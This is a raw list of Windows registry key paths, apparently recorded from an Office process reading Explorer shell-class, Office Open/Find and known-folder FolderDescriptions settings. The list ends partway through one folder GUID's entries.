HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar
HKEY_CURRENT_USER\Software\Classes\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory
HKEY_LOCAL_MACHINE\Software\Classes\Directory
HKEY_CURRENT_USER\Software\Classes\Directory\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Directory\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder
HKEY_LOCAL_MACHINE\Software\Classes\Folder
HKEY_CURRENT_USER\Software\Classes\Folder\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Folder\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Directory\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Folder\DocObject
HKEY_CURRENT_USER\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Directory\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Folder\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Directory\Clsid
HKEY_CURRENT_USER\Software\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Folder\Clsid
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DrawAlerts\FTP Sites
HKEY_CLASSES_ROOT\PackagedCom\ClassIndex\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Open Find
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Open Find
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\VolumePref
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\ParsingName_36354489
